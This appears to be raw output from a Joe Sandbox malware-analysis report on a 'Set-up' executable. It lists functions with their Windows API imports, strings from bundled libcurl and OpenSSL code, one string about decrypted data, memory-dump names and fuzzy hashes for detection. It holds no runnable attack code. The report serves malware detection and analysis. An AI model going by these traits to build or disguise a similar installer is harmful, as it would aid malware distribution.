Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _errno$AttributesFile_fullpathmallocstrlen
String ID:
API String ID: 1976726163-0
Opcode ID: dc23eef72fcb057c8fe4614aa00629ef8f11a3ccfa351fb75ef8e67439820426
Instruction ID: 67866f09a22d6c5917978c8107bd90090b9ce56214a5ff9c8c3dcf3aa191494b
Opcode Fuzzy Hash: dc23eef72fcb057c8fe4614aa00629ef8f11a3ccfa351fb75ef8e67439820426
Instruction Fuzzy Hash: 8F412470604709CFF716EF29D4887AABBE1BF85300F18867AC9C88B2C1D7348545CB92

Function 00CD2430 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CD2666
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CD2699
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00CD26FB
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 00CD273A

Strings

hostip.c, xrefs: 00CD24B4, 00CD253F, 00CD2613, 00CD2626, 00CD2673, 00CD276D, 00CD27AF
Shuffling %i addresses, xrefs: 00CD24A6
:%u, xrefs: 00CD26CC

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strlen$_time64memcpy
String ID: :%u$Shuffling %i addresses$hostip.c
API String ID: 2198566249-1766712111
Opcode ID: da0c0026720d4df524fa47fbbefab9009a20533e373d6a480a7e01b98302a79e
Instruction ID: 9edbc0272551d3d703cf4935f3c8e5693af99407b0b819875d270f2eeec68c1f
Opcode Fuzzy Hash: da0c0026720d4df524fa47fbbefab9009a20533e373d6a480a7e01b98302a79e
Instruction Fuzzy Hash: E4A1E2756047009BD735DF19D885F6BB3E5EFA4304F19852EEE9987382E331EA118B81

Function 01006940 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 010069F1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000001,00000000,00000000,?,00000009,?), ref: 01006A11
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,000000FF,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 01006A53
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 01006AB6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 01006AC7
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 01006ADA

Strings

UTF-8, xrefs: 010069AF

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _errno$abortmemcpymemset
String ID: UTF-8
API String ID: 3754757788-243350608
Opcode ID: 27310dd004e90a4a454ecd8ff1d72fb7f0531c84e93b4a7dbe279f072b7b9bd5
Instruction ID: 4a7b5057ef7b3fca542920621d7d3e6bff89ee7535808fe37fd0070e4c726c08
Opcode Fuzzy Hash: 27310dd004e90a4a454ecd8ff1d72fb7f0531c84e93b4a7dbe279f072b7b9bd5
Instruction Fuzzy Hash: 4D41FA706043019FFB139F69D895AAB7BDA9B85314F08896DF4C5872C1EA33D854CB52

Function 00C8230E Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 133stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00C82359
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00C82465
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00C824AB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00C823EE

Part of subcall function 00C81A54: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C81A70

Strings

, xrefs: 00C82367
Memory allocation failed for decrypted data., xrefs: 00C82411
, xrefs: 00C8234B
, xrefs: 00C8234F

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: free$abortmallocstrlen
String ID: $ $ $Memory allocation failed for decrypted data.
API String ID: 673139954-1317699236
Opcode ID: 34464bc58f2b7c576a8e223511d69a9cb9f1c527079fc449f66308d00cb3104c
Instruction ID: f565d1e5dab9e94e73bd8ed693c15b676d3bdbd883ca3886835dda870a2ac85b
Opcode Fuzzy Hash: 34464bc58f2b7c576a8e223511d69a9cb9f1c527079fc449f66308d00cb3104c
Instruction Fuzzy Hash: B651A2B49047099FCB04EFA9C08499EBBF0FF88304F10C96AE898A7325E774D9459F56

Function 00E9E110 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E9E16C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E9E17B

Strings

crypto/ui/ui_lib.c, xrefs: 00E9E195
Ente, xrefs: 00E9E145
for, xrefs: 00E9E154
:, xrefs: 00E9E15C
er , xrefs: 00E9E13D
, xrefs: 00E9E14D

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strlen
String ID: $ for$:$Ente$crypto/ui/ui_lib.c$er
API String ID: 39653677-1187194756
Opcode ID: 8ffc3805d0e24633fc02d1eda704f6b409f3c356e0135078664f2586aa75232c
Instruction ID: a51e8dfcf32b035abf2ef9a01ad7c4bbe70826ff9e0b06452726d7a2a596a19a
Opcode Fuzzy Hash: 8ffc3805d0e24633fc02d1eda704f6b409f3c356e0135078664f2586aa75232c
Instruction Fuzzy Hash: C02186F2D052107BE714AA566C41E6B77ECED91398F095839FE4CA6342F631CA18C6A2

Function 00C96330 Relevance: 12.1, APIs: 8, Instructions: 77sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00C9D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00C901B1), ref: 00C9D8E2

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00CC420E,?,?), ref: 00C96350
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00CC420E,?,?,?,?,?,?,?,?,?,00CC420E,?,?), ref: 00C9635B
MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00C96369
Sleep.KERNEL32(00000001), ref: 00C963B2
MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00C963BC
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00CC420E,?,?), ref: 00C963C7
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00CC420E,?,?), ref: 00C963D6

Part of subcall function 00C9D8C0: GetTickCount.KERNEL32 ref: 00C9D968

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00C963ED

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: free$FileMove_strdup$CountCounterPerformanceQuerySleepTick
String ID:
API String ID: 1793959362-0
Opcode ID: 9ccbc967a0249ca841c063b688a7d396bd8b636166bbf9c0c1dec90699cf57e3
Instruction ID: bec53f737166c6514bccca23a97ac3f449b2398ebb191491d0e681bcaadaf985
Opcode Fuzzy Hash: 9ccbc967a0249ca841c063b688a7d396bd8b636166bbf9c0c1dec90699cf57e3
Instruction Fuzzy Hash: 63112BA6D0070067FF127624AC45BBF735CBFA5764F094225FC5852282FB21EA5543D3

Function 00C86220 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143stringCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00C8623A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00C8624D
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00C8627C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00C86389

Strings

., xrefs: 00C86399
hsts.c, xrefs: 00C862C9, 00C862DB, 00C86339, 00C8634B

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strlen$_time64memcpy
String ID: .$hsts.c
API String ID: 2198566249-2242870694
Opcode ID: 1c5ac83622b3213a0544f23d4a6c84d964ad86543dbfb876ff884ae36f606290
Instruction ID: 26284848fc87bceb429dfa9238d418efced65a364fcb7532ed7784cf87d2c845
Opcode Fuzzy Hash: 1c5ac83622b3213a0544f23d4a6c84d964ad86543dbfb876ff884ae36f606290
Instruction Fuzzy Hash: 1A4119BAD083446BEB107E60AC46BAB36885F2431DF080538FD5A53293F671E9289796

Function 01004430 Relevance: 10.6, APIs: 7, Instructions: 108stringnetworkCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,0000002E), ref: 0100447B
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000042), ref: 010044C4
WSAStringToAddressW.WS2_32(?,00000002,00000000,?,00000010), ref: 010044E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(0000002E), ref: 01004500
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0100450B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,0000002E), ref: 0100451F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 01004546

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strlen$strcmp$AddressByteCharMultiStringWide
String ID:
API String ID: 389649969-0
Opcode ID: 0823f8e9ae17aaeb768030e7c87d44536a27add81775cfb543356a269fc89484
Instruction ID: 300fbd53f97c126426310a44cab8d7e0b64cfc5139363995fb4ded5129e81214
Opcode Fuzzy Hash: 0823f8e9ae17aaeb768030e7c87d44536a27add81775cfb543356a269fc89484
Instruction Fuzzy Hash: C3314DB290470567FB229A38DC00BFF76CC9B95355F044239FAD8D61C2EA75E9488356

Function 00EC2240 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,00EBF763,?,?,?,?,?), ref: 00EC2251
WideCharToMultiByte.KERNEL32 ref: 00EC2284
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 00EC22BD

Strings

engines/e_capi_err.c, xrefs: 00EC2321
engines/e_capi.c, xrefs: 00EC2299, 00EC22D0, 00EC2342
ERR_CAPI_error, xrefs: 00EC231A

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$wcslen
String ID: ERR_CAPI_error$engines/e_capi.c$engines/e_capi_err.c
API String ID: 1062461220-336193293
Opcode ID: 1f1faf847ce67f231bd557908549959a9c68b8c93092f253983fcc17053072e3
Instruction ID: 0c1aa6c3a3bde901546b048cc3da342bcd18664ff2c277dbe07a57d896ec0b45
Opcode Fuzzy Hash: 1f1faf847ce67f231bd557908549959a9c68b8c93092f253983fcc17053072e3
Instruction Fuzzy Hash: 54214DB1E053456BF3303A61AD06F2B7A9CDB40708F14643DFB4C751C5FABA98058B61

Function 00E381F0 Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 198stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00DDA9CE,000000D2), ref: 00E383A3
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DDA9CE), ref: 00E383C6

Part of subcall function 00E360E0: GetLastError.KERNEL32(00E37CCC,?,00000000,00E37127,00E37CCC,00000000,00E5CAB7,00C81A70), ref: 00E360E3
Part of subcall function 00E360E0: SetLastError.KERNEL32(00000000), ref: 00E361A5

Strings

crypto/err/err_local.h, xrefs: 00E38311, 00E38332, 00E38385, 00E383E8, 00E384BB

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: ErrorLast$strcpystrlen
String ID: crypto/err/err_local.h
API String ID: 542397150-344804083
Opcode ID: 1593ffd9a27391eec6738ee74d95466e59feb617c4f47b2b4f45241337e2d885
Instruction ID: 9ae8624be78c66e3a4c4dbf03ce8de6ae300b3e22ad46dd1ea5ab00069cd837e
Opcode Fuzzy Hash: 1593ffd9a27391eec6738ee74d95466e59feb617c4f47b2b4f45241337e2d885
Instruction Fuzzy Hash: 7D819671500B01AFE7238F28E999BE3BBE4FB4030CF545D19E6D5972A5EB79A814CB40

Function 00C86730 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 179stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C873F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,00C8CA95,011F8138,00000467,mprintf.c), ref: 00C8741D
Part of subcall function 00C873F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00C87445

Part of subcall function 00CC47D0: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(00000080,00000080,?), ref: 00CC47FB
Part of subcall function 00CC47D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00CC480C
Part of subcall function 00CC47D0: feof.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00CC4837

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 00C86844
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unlimited,0000000A), ref: 00C86876
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00C868FD

Strings

unlimited, xrefs: 00C8686C
%256s "%64[^"]", xrefs: 00C86857
hsts.c, xrefs: 00C86748, 00C8675D, 00C86777, 00C8691D, 00C8694E, 00C8696F

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strlen$feoffgetsmemcmpmemcpy
String ID: %256s "%64[^"]"$hsts.c$unlimited
API String ID: 288886899-2895786126
Opcode ID: 99894c91a238162967bb70057642f08cce2dfc80dcfddf1bc655b36187202d9a
Instruction ID: 8e9f0a1a8352764355847933a6c5b1f5934490061c8f5b86286645276634817b
Opcode Fuzzy Hash: 99894c91a238162967bb70057642f08cce2dfc80dcfddf1bc655b36187202d9a
Instruction Fuzzy Hash: 495146B59483017BEB24BB20DC42F2B7698AF91708F14492CF89DA62C2F731DA14D797

